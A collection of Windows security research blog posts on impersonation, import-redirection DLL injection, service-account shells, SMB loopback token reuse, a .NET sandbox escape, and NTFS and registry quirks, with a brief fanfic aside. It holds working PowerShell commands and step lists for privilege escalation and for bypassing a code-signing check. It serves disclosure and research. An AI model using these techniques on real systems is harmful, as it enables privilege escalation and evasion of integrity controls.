Is this ever useful? One place it might come in handy is if someone tries to sandbox the SYSTEM user in some way. As long as you meet all the requirements up to the Origin Session Check, especially IL, then you can still impersonate other users even if that's been stripped away. This should work even in AppContainers or Restricted as the check for sandbox tokens happens after the session check.

The take away from this blog should be:

  • Removing SeImpersonatePrivilege from SYSTEM services is basically pointless.
  • Never try to create a sandboxed process which uses SYSTEM as the base token, as you can probably circumvent all manner of security checks including impersonation.



DLL Import Redirection in Windows 10 1909

While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

What piqued my interest was that during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
          &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
            LdrpBuildImportRedirection(Dll);
        }
        // ...
    }

}

The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);
    }


    RTL_USER_PROCESS_PARAMETERS Params = {};
    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
    }


    // ...

}

The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
  <xs:complexType>
    <xs:all>
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                  minOccurs="0"/>
    </xs:all>
  </xs:complexType>
</xs:element>

This fits exactly with what I was looking for. Specifically the schema type is ST_DllFile which defines the allowed path component for a package-relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn't seem to find any further reference to it, maybe my Googlefu wasn't working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I know how to implement it inside my own DLL. I need to define a list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;
}


const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
{
    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                  &CreateProcessWForwarder },
};


extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
{
    CURRENT_IMPORT_REDIRECTION_VERSION,
    ARRAYSIZE(RedirectedFunctions),
    RedirectedFunctions

};

I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations; it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your application's dependency graph and doesn't support GetProcAddress. But you could probably live with that.

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was that when I did, process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
{
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;

}

If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;

}

The code is using the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to get the kernel's Code Integrity module to check the signing level. The signing level must be at least level 8, passed in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know: a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.

The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

Getting an Interactive Service Account Shell

Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts, however you'll find it immediately dies:

PS> $p.ExitNtStatus
STATUS_DLL_INIT_FAILED

The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable, miss one resource and it might still not work or it might fail at some indeterminate time. Instead we do what the OS does, we need to create the service token with the Logon Session SID which will grant us access to the session's resources.

First create a SYSTEM PowerShell console on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS>  $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whoami and showing the user as Local Service.



Taking a joke a little too far.

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of disdain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

Sharing a Logon Session a Little Too Much

The Logon Session on Windows is tied to a single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there can be multiple different Tokens, all in the same logon session, with different service groups etc. This blog post demonstrates a case where this sharing of the logon session between multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it: when LSASS creates a Token for a new Logon Session it stores that first Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed: network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? Well, if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) of the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter, as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.
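To illustrate what that parameter buys a caller with TCB, a sketch of the direct route might look like the following; the LUID value is a placeholder, and as we'll see shortly you don't actually need to write any of this because SMB will do the equivalent for us in kernel mode.

#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
#pragma comment(lib, "secur32.lib")

// Illustration only: with SeTcbPrivilege you can pass another logon session's
// LUID as pvLogonID to get credentials which authenticate as that session.
bool AcquireCredsForSession(LUID session_luid) {
    CredHandle cred = {};
    TimeStamp expiry = {};
    SECURITY_STATUS status = AcquireCredentialsHandleW(
        nullptr,                              // principal
        const_cast<LPWSTR>(L"Negotiate"),     // package
        SECPKG_CRED_OUTBOUND,
        &session_luid,                        // pvLogonID: the target session
        nullptr, nullptr, nullptr,
        &cred, &expiry);
    if (status != SEC_E_OK)
        return false;
    // ... use the handle with InitializeSecurityContext for a loopback
    // authentication; the server-side token is then the session's token ...
    FreeCredentialsHandle(&cred);
    return true;
}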

Of course if you have TCB you can almost do whatever you like, so why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Are there any primitives which SMB supports which allow you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loopback authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox; I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this had always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the takeaway is that at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized that it's almost certainly (mostly) my fault that the .NET Framework has this feature, and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such as a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, so could we use something like this?

EventHandler f = (o, e) => File.OpenRead(@"C:\SomePath");

Unfortunately not; the C# compiler takes the lambda and generates an anonymous class with a method matching that prototype in your own assembly. Therefore the call which adapts the arguments goes through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression<EventHandler> lambda = (o, e) => File.OpenRead(@"C:\SomePath");
EventHandler f = lambda.Compile();

We're still using a lambda, surely nothing has changed? Well, let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides that rather than creating a delegate in your assembly it'll create something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is that this delegate was trusted, as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement an arbitrary Delegate adapter to convert one Delegate call-site into calling any other API, as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never fully scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context, including things like JavaScript engines such as V8 or JSCore.


Writing Windows File System Drivers is Hard.

A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine: you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, and if you specify neither flag a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is that if you create a directory using the $INDEX_ALLOCATION trick the new SD will inherit as if it were a File rather than a Directory. We can verify this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ


Is this useful? Honestly, probably not. The only scenario I can imagine where it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant you access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified when determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why the design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


Silent Exploit Mitigations for the 1%

With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problem with many of these mitigations is that they're regularly undocumented, or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations is the pair of additional OBJECT_ATTRIBUTE flags, OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE, which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time: originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael's fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3; maybe it's some new Microsoft counting system. NtLoadKeyEx is partially exposed through the Win32 RegLoadKey and RegLoadAppKey APIs, although they only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather than a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the log files to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

NtLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege, like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure whether, if they ever needed to extend the system call again, to go for NtLoadKey4 or NtLoadKeyExEx, so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx, is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

OBJ_DONT_REPARSE is (mostly) Useless.

Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE, isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect: there should be no reparse points to access notepad, so what went wrong? Well, you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still, this does mean that it will also protect you from Registry Symbolic Links, as those also use a Reparse Point.

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying, especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK, which does what you'd want to avoid file system symbolic links, but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks anyway. It doesn't prevent abuse of shadow directories, for example, which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Generating NDR Type Serializers for C#

As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

